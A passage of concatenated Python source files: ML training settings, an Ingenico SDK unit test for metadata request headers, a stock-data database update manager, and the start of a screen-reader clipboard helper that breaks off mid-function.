Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_reslen20_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_minlen20_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
Settings["models"].append(DefaultModel.copy())
n+=1
Settings["models"][n]["dataset_pointer"] = -1
Settings["models"][n]["dataset_name"] = "5556x_mark_res_299x299"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_nosplit_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
return Settings
| previtus/MGR-Project-Code | Settings/set1-test_of_models_against_datasets/mix299.py | Python | mit | 1,829 |
# -*- coding: UTF-8 -*-
import base64
import unittest
from ingenico.connect.sdk.defaultimpl.default_marshaller import DefaultMarshaller
from ingenico.connect.sdk.domain.metadata.shopping_cart_extension import ShoppingCartExtension
from ingenico.connect.sdk.meta_data_provider import MetaDataProvider
from ingenico.connect.sdk.request_header import RequestHeader
class MetaDataProviderTest(unittest.TestCase):
"""Contains tests to check that the meta data provider correctly stores allowed request headers
and refuses prohibited headers
"""
def test_server_meta_data_headers_full(self):
"""Tests that the MetaDataProvider can construct meta_data_headers when supplied with a full shopping cart"""
shopping_cart_extension = ShoppingCartExtension("Ingenico.creator", "Extension", "1.0", "ExtensionId")
meta_data_provider = MetaDataProvider("Ingenico", shopping_cart_extension)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", shopping_cart_extension, request_headers[0])
def test_server_meta_data_headers_full_no_shopping_cart_extension_id(self):
"""Tests that the MetaDataProvider can construct meta_data_headers when supplied with a full shopping cart"""
shopping_cart_extension = ShoppingCartExtension("Ingenico.creator", "Extension", "1.0")
meta_data_provider = MetaDataProvider("Ingenico", shopping_cart_extension)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", shopping_cart_extension, request_headers[0])
def test_get_server_metadata_headers_no_additional_headers(self):
"""Tests that the MetaDataProvider functions correctly without any additional headers as arguments"""
meta_data_provider = MetaDataProvider("Ingenico")
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(1, len(request_headers))
self.assertServerMetaInfo(meta_data_provider, "Ingenico", None, request_headers[0])
def test_get_server_metadata_headers_additional_headers(self):
"""Tests that the MetaDataProvider can handle multiple additional headers"""
additional_headers = [RequestHeader("Header1", "&=$%"), RequestHeader("Header2", "blah blah"),
RequestHeader("Header3", "foo")]
meta_data_provider = MetaDataProvider("Ingenico", None, additional_headers)
request_headers = meta_data_provider.meta_data_headers
self.assertEqual(4, len(request_headers))
for index in range(1, 4):
self.assertEqual(additional_headers[index-1].name, request_headers[index].name)
self.assertEqual(additional_headers[index-1].value, request_headers[index].value)
def test_constructor_with_prohibited_headers(self):
"""Tests that the MetaDataProvider constructor does not accept any headers marked as prohibited"""
for name in MetaDataProvider.prohibited_headers:
additional_headers = [RequestHeader("Header1", "Value1"),
RequestHeader(name, "should be slashed and burnt"),
RequestHeader("Header3", "Value3")]
with self.assertRaises(Exception) as error:
MetaDataProvider("Ingenico", None, additional_headers)
self.assertIn(name, str(error.exception))
def assertServerMetaInfo(self, meta_data_provider, integrator, shopping_cart_extension=None, request_header=None):
"""Assert that checks that the request_header is the default header "X-GCS-ServerMetaInfo",
that the server_meta_data_info of the meta_data_provider is correct
and that the shopping cart extension is consistent with the extension stored in meta_data_provider
"""
self.assertEqual("X-GCS-ServerMetaInfo", request_header.name)
self.assertIsNotNone(request_header.value)
# server_meta_info is stored in json format and encoded using utf-8 and base64 encoding, decode it
server_meta_info_json = base64.b64decode(request_header.value).decode('utf-8')
server_meta_info = DefaultMarshaller.INSTANCE().unmarshal(server_meta_info_json, MetaDataProvider.ServerMetaInfo)
self.assertEqual(meta_data_provider._platform_identifier, server_meta_info.platform_identifier)
self.assertEqual(meta_data_provider._sdk_identifier, server_meta_info.sdk_identifier)
self.assertEqual("Ingenico", server_meta_info.sdk_creator)
self.assertEqual(integrator, server_meta_info.integrator)
if shopping_cart_extension is None:
self.assertIsNone(server_meta_info.shopping_cart_extension)
else:
self.assertEqual(shopping_cart_extension.creator, server_meta_info.shopping_cart_extension.creator)
self.assertEqual(shopping_cart_extension.name, server_meta_info.shopping_cart_extension.name)
self.assertEqual(shopping_cart_extension.version, server_meta_info.shopping_cart_extension.version)
self.assertEqual(shopping_cart_extension.extension_id, server_meta_info.shopping_cart_extension.extension_id)
if __name__ == '__main__':
unittest.main()
| Ingenico-ePayments/connect-sdk-python3 | tests/unit/test_meta_data_provider.py | Python | mit | 5,371 |
# -*- coding: utf-8 -*-
import threading
import logging
import unittest
import gc
from stockviderApp.utils import retryLogger
from stockviderApp.sourceDA.symbols.referenceSymbolsDA import ReferenceSymbolsDA
from stockviderApp.localDA.symbols.dbReferenceSymbolsDA import DbReferenceSymbolsDA
from stockviderApp.sourceDA.symbols.googleSymbolsDA import GoogleSymbolsDA
from stockviderApp.sourceDA.symbols.yahooSymbolsDA import YahooSymbolsDA
from stockviderApp.sourceDA.symbols.wikiSymbolsDA import WikiSymbolsDA
from stockviderApp.localDA.symbols.dbGoogleSymbolsDA import DbGoogleSymbolsDA
from stockviderApp.localDA.symbols.dbYahooSymbolsDA import DbYahooSymbolsDA
from stockviderApp.localDA.symbols.dbWikiSymbolsDA import DbWikiSymbolsDA
from stockviderApp.localDA.rawData.dbGoogleRawDataDA import DbGoogleRawDataDA
from stockviderApp.localDA.rawData.dbYahooRawDataDA import DbYahooRawDataDA
from stockviderApp.localDA.rawData.dbWikiRawDataDA import DbWikiRawDataDA
from stockviderApp.sourceDA.rawData.googleRawDataDA import GoogleRawDataDA
from stockviderApp.sourceDA.rawData.yahooRawDataDA import YahooRawDataDA
from stockviderApp.sourceDA.rawData.wikiRawDataDA import WikiRawDataDA
from stockviderApp.sourceDA.rawData.referenceRawDataDA import ReferenceRawDataDA
from stockviderApp.localDA.rawData.dbReferenceRawDataDA import DbReferenceRawDataDA
class ThreadUpdateRawData(threading.Thread):
'''
    Threading class handling data retrieval from Quandl sources.
'''
threadLimiter = threading.BoundedSemaphore(3)
    # There are at most 3 of them anyway
def __init__(self, _updateFunc, _symbolList, _exchange):
threading.Thread.__init__(self)
self.updateFunc = _updateFunc
self.symbolList = _symbolList
self.exchange = _exchange
        # Get the logger
self.logger = logging.getLogger(__name__)
return
def run(self):
        # Request the acquisition of a thread slot
ThreadUpdateRawData.threadLimiter.acquire()
        # Split the symbol list into several lists (memory issues)
listOfSymbsList = ThreadUpdateRawData._chunks(self.symbolList, 100)
for (curIndex, currentSymbolsList) in enumerate(listOfSymbsList):
self.logger.info("Traitement de la liste " + str(curIndex + 1) +
"/" + str(len(listOfSymbsList)))
            # Run the update function
self.updateFunc(currentSymbolsList, self.exchange)
            # Release the memory cleanly
gc.collect()
        # Release the thread slot
ThreadUpdateRawData.threadLimiter.release()
return
@classmethod
def _chunks(cls, l, n):
'''
        Chunks the list and returns it as multiple lists of size n.
:param l: list to chunck
:type l: list
:param n: chunck size
:type n: int
:returns: list of chunked lists
:rtype: list
'''
listOfLists = []
for i in range(0, len(l), n):
listOfLists.append(l[i:i+n])
return listOfLists
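    # Hedged illustration (not in the original): for example
    #   ThreadUpdateRawData._chunks([1, 2, 3, 4, 5], 2) -> [[1, 2], [3, 4], [5]]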
class DbManager(object):
'''
Class wrapping all procedures to update the local database from
outside sources.
'''
    # To remove in production - useful in debug to limit data retrieval
    limitNbr = None # If set to None, it is not taken into account
exchangeTuple = ('NYSE', 'NASDAQ')
instrumentType = 'EQUITIES'
def __init__(self):
        # Get the logger
self.logger = logging.getLogger(__name__)
return
def runTest(self):
'''
Runs tests.
'''
self.logger.info("Début des tests unitaires")
self._runUnitTest()
self.logger.info("Fin des tests unitaires")
return
def runSymbols(self):
'''
Handles the symbol tables update in the database.
'''
self.logger.info("Début de l'update des symbols Quandl")
        # Update the symbols of the Quandl tables
self._updateQuandlSymbols(self.exchangeTuple)
self.logger.info("Fin de l'update des symbols Quandl")
self.logger.info("Début de l'update des symbols de référence")
        # Update the reference symbols
for exchange in self.exchangeTuple:
self.logger.info("Référence - ajout des symbols de " + str(exchange))
self._updateReferenceSymbols(exchange, self.instrumentType)
self.logger.info("Fin de l'update des symbols de référence")
self.logger.info("Début du nettoyage des symbols de référence")
        # Clean the duplicates in the reference symbols between Nyse and Nasdaq
self._cleanDuplicatedReferenceSymbols()
self.logger.info("Fin du nettoyage des symbols de référence")
self.logger.info("Début du mapping des symbols de référence")
        # Map the reference symbols
for exchange in self.exchangeTuple:
self.logger.info("Référence - mapping des symbols de " + str(exchange))
self._mapReferenceSymbols(exchange)
self.logger.info("Fin du mapping des symbols de référence")
return
def runQuandlRawData(self, exchange):
'''
Handle the Quandl data update in the database.
'''
self.logger.info("Début de traitement des raw data Quandl de " + str(exchange))
self._updateQuandlRawData(exchange)
return
def runReferenceRawData(self, exchange):
'''
Handle the aggregated data update in the database.
'''
self.logger.info("Début de traitement des raw data Reference de " + str(exchange))
self._updateReferenceRawData(exchange)
return
# -------------------------------------------------------------
def _runUnitTest(self):
'''
Runs unit tests.
'''
        # Run the tests
testsuite = unittest.TestLoader().discover('./test/')
testResults = unittest.TextTestRunner(verbosity=1).run(testsuite)
        # Log the errors and the failures
self.logger.warning("Erreur de test : ")
for errorString in testResults.errors:
self.logger.error(errorString)
for failureString in testResults.failures:
self.logger.error(failureString)
return
    # ------------------ Symbol update methods -------------------
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateReferenceSymbols(self, exchange, instrumentType):
'''
Updates the reference symbol table in the database.
:param exchange: name of the exchange
:type exchange: str
:param instrumentType: type of instrument (EQUITIES, BOND, ...)
:type instrumentType: str
.. warning::
This procedure must be called after the local update of the Quandl
symbols.
'''
        # Set up the DAO for the reference symbols
referenceSymbolsDAO = ReferenceSymbolsDA(exchange)
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
        # Retrieve the reference symbols
referenceSymbolsList = referenceSymbolsDAO.returnSymbolsList(instrumentType)[0:DbManager.limitNbr]
        # Add them to the DB
dbReferenceSymbolDAO.updateOrAddSymbolsList(referenceSymbolsList, exchange)
self.logger.info("Référence - symbols ajoutés dans la table")
return
def _cleanDuplicatedReferenceSymbols(self):
'''
Cleans the reference symbol table from duplicated entries.
.. note::
It may happen that the same symbol is listed on both NYSE and
NASDAQ. This procedure ensures that these symbols are only recorded
once in the database.
'''
        # Set up the local DAO for the reference symbols
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
dbReferenceSymbolDAO.cleanDuplicatedSymbols('NYSE', 'NASDAQ')
self.logger.info("Référence - NYSE/NASDAQ nettoyés")
return
def _mapReferenceSymbols(self, exchange):
'''
        Maps the 1-1 relations of the reference symbol objects to the
        corresponding Quandl symbols.
:param exchange: name of the exchange
:type exchange: str
'''
        # Set up the DAO for the reference symbols
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
        # Retrieve all the symbols of the exchange
referenceSymbolsList = dbReferenceSymbolDAO.getAllSymbolsList(exchange)
refSymbolNamesList = [refSymbol.symbol for refSymbol in referenceSymbolsList]
        # Map the reference symbols to the symbols of each source
dbReferenceSymbolDAO.mapOneToOneRelationsSymbols(refSymbolNamesList, exchange)
self.logger.info("Référence - symbols mappés")
return
def _updateQuandlSymbols(self, exchangeNamesTuple):
'''
Updates the Quandl symbol tables in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
self.logger.info("Début de l'update des symbols Google")
self._updateGoogleSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Google")
self.logger.info("Début de l'update des symbols Yahoo")
self._updateYahooSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Yahoo")
self.logger.info("Début de l'update des symbols Wiki")
self._updateWikiSymbols(exchangeNamesTuple)
self.logger.info("Fin de l'update des symbols Wiki")
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateGoogleSymbols(self, exchangeNamesTuple):
'''
Updates the Google symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
        # Set up the symbol DAOs
googleSymbolsDAO = GoogleSymbolsDA()
dbGoogleSymbolsDAO = DbGoogleSymbolsDA()
        # Retrieve all the symbols from the source
symbolsListGoogle = googleSymbolsDAO.returnSymbolsDict()
        # Build the list of effective exchanges for this source
googleExchangeNamesList = []
for exchange in exchangeNamesTuple:
googleExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Google'])
googleExchangeNamesList = list(set(googleExchangeNamesList))
        # Add the symbols to the DB for each exchange in the tuple
for exchange in googleExchangeNamesList:
self.logger.info("Google - traitement des symbols de " + str(exchange))
            # Retrieve the list of symbols for this exchange
currentSymbolsList = symbolsListGoogle[exchange][0:DbManager.limitNbr]
            # Add them to the DB
dbGoogleSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateYahooSymbols(self, exchangeNamesTuple):
'''
Updates the Yahoo symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
        # Set up the symbol DAOs
yahooSymbolsDAO = YahooSymbolsDA()
dbYahooSymbolsDAO = DbYahooSymbolsDA()
        # Retrieve all the symbols from the source
symbolsListYahoo = yahooSymbolsDAO.returnSymbolsDict()
        # Build the list of effective exchanges for this source
yahooExchangeNamesList = []
for exchange in exchangeNamesTuple:
yahooExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Yahoo'])
yahooExchangeNamesList = list(set(yahooExchangeNamesList))
        # Add the symbols to the DB for each exchange in the tuple
for exchange in yahooExchangeNamesList:
self.logger.info("Yahoo - traitement des symbols de " + str(exchange))
            # Retrieve the list of symbols for this exchange
currentSymbolsList = symbolsListYahoo[exchange][0:DbManager.limitNbr]
            # Add them to the DB
dbYahooSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=30)
def _updateWikiSymbols(self, exchangeNamesTuple):
'''
Updates the Wiki symbol table in the database.
:param exchangeNamesTuple: tuple of exchange names
:type exchangeNamesTuple: tuple
'''
        # Set up the symbol DAOs
wikiSymbolsDAO = WikiSymbolsDA()
dbWikiSymbolsDAO = DbWikiSymbolsDA()
        # Retrieve all the symbols from the source
symbolsListWiki = wikiSymbolsDAO.returnSymbolsDict()
        # Build the list of effective exchanges for this source
wikiExchangeNamesList = []
for exchange in exchangeNamesTuple:
wikiExchangeNamesList.append(self._returnEffectiveExchange(exchange)['Wiki'])
wikiExchangeNamesList = list(set(wikiExchangeNamesList))
        # Add the symbols to the DB for each exchange in the tuple
for exchange in wikiExchangeNamesList:
self.logger.info("Wiki - traitement des symbols de " + str(exchange))
            # Retrieve the list of symbols for this exchange
currentSymbolsList = symbolsListWiki[exchange][0:DbManager.limitNbr]
            # Add them to the DB
dbWikiSymbolsDAO.updateOrAddSymbolsList(currentSymbolsList, exchange)
return
    # -------------- Raw data update methods ---------------------
def _updateQuandlRawData(self, exchange):
'''
Updates the Quandl data tables in the database.
:param exchange: name of the exchange
:type exchange: str
'''
        # These lists store the Db objects of the symbols
googleSymbolsList = []
yahooSymbolsList = []
wikiSymbolsList = []
        # Retrieve the DAOs
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
        # Iterate over the list of reference symbols
for refSymbol in dbReferenceSymbolDAO.getAllSymbolsList(exchange):
            # For each reference symbol, retrieve the symbol of each source
            # and append it to its list if it exists
if refSymbol.googleSymbol is not None:
googleSymbolsList.append(refSymbol.googleSymbol)
if refSymbol.yahooSymbol is not None:
yahooSymbolsList.append(refSymbol.yahooSymbol)
if refSymbol.wikiSymbol is not None:
wikiSymbolsList.append(refSymbol.wikiSymbol)
self.logger.info("Liste de symbols (Google, Yahoo, Wiki) assemblées")
self.logger.info("Début de la maj des raw data (Google, Yahoo Wiki) (threading)")
        # Create one thread per source and run the update function
googleThread = ThreadUpdateRawData(self._updateGoogleRawData, googleSymbolsList, exchange)
yahooThread = ThreadUpdateRawData(self._updateYahooRawData, yahooSymbolsList, exchange)
wikiThread = ThreadUpdateRawData(self._updateWikiRawData, wikiSymbolsList, exchange)
googleThread.start()
yahooThread.start()
wikiThread.start()
        # They must be joined before leaving this function to make sure everyone is finished
googleThread.join()
yahooThread.join()
wikiThread.join()
self.logger.info("Google - fin de la maj des raw data")
self.logger.info("Yahoo - fin de la maj des raw data")
self.logger.info("Wiki - fin de la maj des raw data")
self.logger.info("Fin de la maj des raw data (Google, Yahoo Wiki) (threading)")
return
def _updateReferenceRawData(self, exchange):
'''
Updates the reference (aggregated) data table in the database.
:param exchange: name of the exchange
:type exchange: str
'''
        # Retrieve the DAOs
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
        # This list stores the Db objects of the symbols
refSymbolsList = []
self.logger.info("Début de la maj des raw data de reference (threading)")
        # Build the list of reference symbols to process
        # It is built after the update of the other symbols because otherwise
        # the retrieved reference symbols would not be up to date.
for refSymbol in dbReferenceSymbolDAO.getAllSymbolsList(exchange):
if refSymbol.googleSymbol is not None or refSymbol.yahooSymbol is not None \
or refSymbol.wikiSymbol is not None :
refSymbolsList.append(refSymbol)
        # Process the reference raw data by putting them in a thread
        # Here the thread serves no purpose except to benefit from its chunking function
referenceThread = ThreadUpdateRawData(self._updateReferenceRawDataLists, refSymbolsList, exchange)
referenceThread.start()
referenceThread.join()
self.logger.info("Référence - fin de la maj des raw data")
return
def _updateGoogleRawData(self, dbSymbolsList, exchange):
'''
Updates the Google data table in the database.
:param dbSymbolsList: list of Google symbol objects
        :type dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Google - début de la maj des raw data")
        # List of raw data objects to update
toUpdateRawDataList = []
toMapSymbolNamesList = []
        # List of problematic symbols
issuesSymbolsList = []
        # Retrieve the DAOs
googleRawDataDAO = GoogleRawDataDA()
dbGoogleRawDataDAO = DbGoogleRawDataDA()
dbGoogleSymbolsDAO = DbGoogleSymbolsDA()
        # For each symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("GOOGLE : " + str(exchange) + "-" + dbSymbol.symbol.upper())
            # Name of the symbol to request from Quandl
googleSymbolName = "_".join([dbSymbol.exchange.upper(), dbSymbol.symbol.upper()])
            # Call the data retrieval function
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
googleSymbolName,
googleRawDataDAO)
            # In this case the data was not retrieved correctly.
            # Everything has been logged, we can move on to the next symbol.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
            # Put these data in the list of data to update
toUpdateRawDataList.append(rawDataDict)
if isNew:
                # Put the symbol in the list of symbols to map
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
        # Perform all the DB updates
dbGoogleRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
        # Perform the mapping
dbGoogleSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Google - symbols à problèmes : " + str(issuesSymbolsList))
return
def _updateYahooRawData(self, dbSymbolsList, exchange):
'''
Updates the Yahoo data table in the database.
:param dbSymbolsList: list of Yahoo symbol objects
        :type dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Yahoo - début de la maj des raw data")
        # List of raw data objects to update
toUpdateRawDataList = []
toMapSymbolNamesList = []
        # List of problematic symbols
issuesSymbolsList = []
        # Retrieve the DAOs
yahooRawDataDAO = YahooRawDataDA()
dbYahooRawDataDAO = DbYahooRawDataDA()
dbYahooSymbolsDAO = DbYahooSymbolsDA()
exchange = self._returnEffectiveExchange(exchange)['Yahoo']
        # For each symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("YAHOO : " + str(exchange) + "-" + dbSymbol.symbol.upper())
            # Name of the symbol to request from Quandl
yahooSymbolName = dbSymbol.symbol.upper()
            # Call the data retrieval function
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
yahooSymbolName,
yahooRawDataDAO)
            # In this case the data was not retrieved correctly.
            # Everything has been logged, we can move on to the next symbol.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
            # Put these data in the list of data to update
toUpdateRawDataList.append(rawDataDict)
if isNew:
                # Put the symbol in the list of symbols to map
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
        # Perform all the DB updates
dbYahooRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
        # Perform the mapping
dbYahooSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Yahoo - symbols à problèmes : " + str(issuesSymbolsList))
return
def _updateWikiRawData(self, dbSymbolsList, exchange):
'''
Updates the Wiki data table in the database.
:param dbSymbolsList: list of Wiki symbol objects
        :type dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Wiki - début de la maj des raw data")
        # List of raw data objects to update
toUpdateRawDataList = []
toMapSymbolNamesList = []
        # List of problematic symbols
issuesSymbolsList = []
        # Retrieve the DAOs
wikiRawDataDAO = WikiRawDataDA()
dbWikiRawDataDAO = DbWikiRawDataDA()
dbWikiSymbolsDAO = DbWikiSymbolsDA()
exchange = self._returnEffectiveExchange(exchange)['Wiki']
        # For each symbol
for dbSymbol in dbSymbolsList:
self.logger.debug("WIKI : " + str(exchange) + "-" + dbSymbol.symbol.upper())
            # Name of the symbol to request from Quandl
wikiSymbolName = dbSymbol.symbol.upper()
            # Call the data retrieval function
returnValue = self._returnQuandlRawDataDictAndNew(dbSymbol,
wikiSymbolName,
wikiRawDataDAO)
            # In this case the data was not retrieved correctly.
            # Everything has been logged, we can move on to the next symbol.
if returnValue is None:
issuesSymbolsList.append({'Symbol' : dbSymbol.symbol.upper(),
'Exchange' : dbSymbol.exchange.upper()})
continue
(isNew, rawDataDict) = returnValue
            # Put these data in the list of data to update
toUpdateRawDataList.append(rawDataDict)
if isNew:
                # Put the symbol in the list of symbols to map
toMapSymbolNamesList.append(dbSymbol.symbol.upper())
        # Perform all the DB updates
dbWikiRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
        # Perform the mapping
dbWikiSymbolsDAO.mapOneToOneRelations(toMapSymbolNamesList, exchange)
self.logger.warning("Wiki - symbols à problèmes : " + str(issuesSymbolsList))
return
@retryLogger(maxRetryNbr=3, sleepTimeIncr=10)
def _returnQuandlRawDataDictAndNew(self, dbSymbol, quandlSymbolName, rawDataDAO):
'''
Returns the rawData dict of the symbol fetched from Quandl. Indicates
also if the rawData is new to the database (1st time fetched).
:param dbSymbol: symbol object
:type dbSymbol: BaseSymbol
:param quandlSymbolName: name of the symbol to fetch from Quandl
:type quandlSymbolName: str
:param rawDataDAO: data access object to the Quandl database
:type rawDataDAO: QuandlRawDataDA
:returns: tuple with the raw data dict and a boolean indicating if the
data is new to the local database.
:rtype: tuple
'''
        # Boolean to know whether the data is new or not
isNew = False
        # Retrieve the meta data
metaData = rawDataDAO.returnMetaData(quandlSymbolName)
        # Initialise the data frame (if 2 updates are run without an update on the
        # quandl side it will stay None because no new date will be retrieved).
dataFrame = None
        # If the raw data of the symbol does not exist
if dbSymbol.rawData is None:
            # Retrieve the whole data set
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
metaData['oldest_available_date'],
metaData['newest_available_date'])
            # This is new data
isNew = True
else:
            # Retrieve the data
if metaData['oldest_available_date'] < dbSymbol.rawData.oldestDateAvailable:
                # Perform a full update
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
metaData['oldest_available_date'],
metaData['newest_available_date'])
elif dbSymbol.rawData.newestDateAvailable < metaData['newest_available_date']:
                # Only retrieve the missing piece
dataFrame = rawDataDAO.returnDataFrame(quandlSymbolName,
dbSymbol.rawData.newestDateAvailable ,
metaData['newest_available_date'])
        # Build the dict of the symbol and the raw data
rawDataDict = {'symbol' : dbSymbol.symbol.upper(),
'metaData': metaData,
'dataFrame' : dataFrame}
return (isNew, rawDataDict)
def _updateReferenceRawDataLists(self, dbSymbolsList, exchange):
'''
Updates the reference (aggregated) data table in the database.
:param dbSymbolsList: list of reference symbol objects
        :type dbSymbolsList: list
:param exchange: name of the exchange
:type exchange: str
'''
self.logger.info("Référence - début de la maj des raw data")
        # List of raw data objects to update
toUpdateRawDataList = []
toMapSymbolNamesList = []
        # List of problematic symbols
issuesSymbolsList = []
        # Retrieve the DAOs of the reference symbols
dbReferenceSymbolDAO = DbReferenceSymbolsDA()
referenceRawDataDAO = ReferenceRawDataDA()
dbReferenceRawDataDAO = DbReferenceRawDataDA()
        # Iterate over the list of reference symbols
for refSymbol in dbSymbolsList:
self.logger.debug("REFERENCE : " + str(exchange) + "-" + refSymbol.symbol.upper())
try:
                # Retrieve the meta data
metaData = referenceRawDataDAO.returnMetaData(refSymbol)
                # Initialise the dataFrame
dataFrame = None
                # Initialise the raw data of the symbol if it does not exist
if refSymbol.rawData is None:
                    # Retrieve the whole data set
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
metaData['oldest_available_date'],
metaData['newest_available_date'])
                    # Put the symbol in the list of symbols to map
toMapSymbolNamesList.append(refSymbol.symbol.upper())
else:
                    # Retrieve the data
if metaData['oldest_available_date'] < refSymbol.rawData.oldestDateAvailable:
                        # Perform a full update
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
metaData['oldest_available_date'],
metaData['newest_available_date'])
elif refSymbol.rawData.sourceNewestConsolidatedDate < metaData['newest_available_date']:
                        # Only retrieve the missing piece
dataFrame = referenceRawDataDAO.returnDataFrame(refSymbol,
refSymbol.rawData.sourceNewestConsolidatedDate ,
metaData['newest_available_date'])
                # Put these data in the list of data to update
rawDataDict = {'symbol' : refSymbol.symbol.upper(),
'metaData': metaData,
'dataFrame' : dataFrame}
toUpdateRawDataList.append(rawDataDict)
except Exception as e:
                # In this case there was a problem with this symbol,
                # we add it to the list of problematic symbols
self.logger.error('Erreur', exc_info=True)
issuesSymbolsList.append({'Symbol' : refSymbol.symbol.upper(),
'Exchange' : refSymbol.exchange.upper()})
        # Perform the db update
dbReferenceRawDataDAO.updateOrAddRawDataList(toUpdateRawDataList, exchange)
        # Perform the mapping
dbReferenceSymbolDAO.mapOneToOneRelationsRawData(toMapSymbolNamesList, exchange)
self.logger.warning("Référence - symbols à problèmes : " + str(issuesSymbolsList))
return
    # ---------------- Utility methods -----------------------
def _returnEffectiveExchange(self, exchange):
'''
        Returns a dict with the effective exchange name for each source.
:param exchange: name of the exchange
:type exchange: str
:returns: dict of effective name ordered by source
:rtype: dict
.. note::
Dict attribute access:
>>> exchangeDict['Google']
>>> exchangeDict['Yahoo']
>>> exchangeDict['Wiki']
'''
exchangeDict = {}
exchangeDict['Google'] = exchange.upper()
if exchange.upper() in ('NYSE', 'NASDAQ'):
exchangeDict['Yahoo'] = 'OTHER'
exchangeDict['Wiki'] = 'OTHER'
return exchangeDict
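# Hedged usage sketch (the driver flow and logging setup are assumptions; the DAO
# classes imported above are expected to be configured elsewhere): a typical update
# run simply chains the public methods of DbManager for each exchange.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    manager = DbManager()
    manager.runSymbols()
    for exchange_name in DbManager.exchangeTuple:
        manager.runQuandlRawData(exchange_name)
        manager.runReferenceRawData(exchange_name)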
| aberdah/Stockvider | stockvider/stockviderApp/dbManager.py | Python | mit | 33,602 |
# -*- coding: utf-8 -*-
import wx
import win32clipboard
import win32con
import gui
import treeInterceptorHandler
import textInfos
import globalVars
def getSelectedText():
obj = globalVars.focusObject
if isinstance(obj.treeInterceptor, treeInterceptorHandler.DocumentTreeInterceptor) and not obj.treeInterceptor.passThrough:
obj = obj.treeInterceptor
try:
info = obj.makeTextInfo(textInfos.POSITION_SELECTION)
except (RuntimeError, NotImplementedError):
info = None
if not info or info.isCollapsed:
return None
return info.text
def getClipboardText():
try:
win32clipboard.OpenClipboard()
except win32clipboard.error:
return None
try:
text = win32clipboard.GetClipboardData(win32con.CF_UNICODETEXT)
except:
text = None
finally:
win32clipboard.CloseClipboard()
return text
def setClipboardText(text):
if not isinstance(text, unicode) or len(text)==0 or text.isspace():
return False
try:
win32clipboard.OpenClipboard()
except win32clipboard.error:
return False
try:
win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(win32con.CF_UNICODETEXT, text)
success = True
except:
success = False
win32clipboard.CloseClipboard()
return success
class TextWindow(wx.Frame):
def __init__(self, text, title, readOnly=True):
super(TextWindow, self).__init__(gui.mainFrame, title=title)
sizer = wx.BoxSizer(wx.VERTICAL)
style = wx.TE_MULTILINE | wx.TE_RICH
if readOnly:
style |= wx.TE_READONLY
self.outputCtrl = wx.TextCtrl(self, style=style)
self.outputCtrl.Bind(wx.EVT_KEY_DOWN, self.onOutputKeyDown)
sizer.Add(self.outputCtrl, proportion=1, flag=wx.EXPAND)
self.SetSizer(sizer)
sizer.Fit(self)
self.outputCtrl.SetValue(text)
self.outputCtrl.SetFocus()
self.Raise()
self.Maximize()
self.Show()
def onOutputKeyDown(self, event):
